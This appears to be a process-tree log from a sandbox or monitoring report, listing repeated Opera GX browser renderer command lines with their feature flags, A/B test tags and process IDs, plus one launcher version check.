C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=196 --field-trial-handle=8104,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6396 /prefetch:12⤵PID:3832
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=197 --field-trial-handle=10428,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10100 /prefetch:12⤵PID:4932
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=198 --field-trial-handle=10616,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10128 /prefetch:12⤵PID:8188
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=199 --field-trial-handle=6556,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9652 /prefetch:12⤵PID:2232
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=200 --field-trial-handle=10600,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7784 /prefetch:12⤵PID:7608
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=201 --field-trial-handle=9820,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9256 /prefetch:12⤵PID:4576
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=202 --field-trial-handle=10148,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=6456 /prefetch:12⤵PID:6520
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=203 --field-trial-handle=6404,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9416 /prefetch:12⤵PID:4732
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\launcher.exe" --version2⤵PID:7488
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=204 --field-trial-handle=9140,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8488 /prefetch:12⤵PID:3908
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=205 --field-trial-handle=9440,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10648 /prefetch:12⤵PID:1132
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=206 --field-trial-handle=10744,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8568 /prefetch:12⤵PID:1316
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=207 --field-trial-handle=10660,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9736 /prefetch:12⤵PID:6600
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=208 --field-trial-handle=10320,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10448 /prefetch:12⤵PID:376
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=209 --field-trial-handle=7056,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8004 /prefetch:12⤵PID:7988
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=210 --field-trial-handle=9476,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10220 /prefetch:12⤵PID:5148
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=211 --field-trial-handle=9264,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9312 /prefetch:12⤵PID:1340
-
-
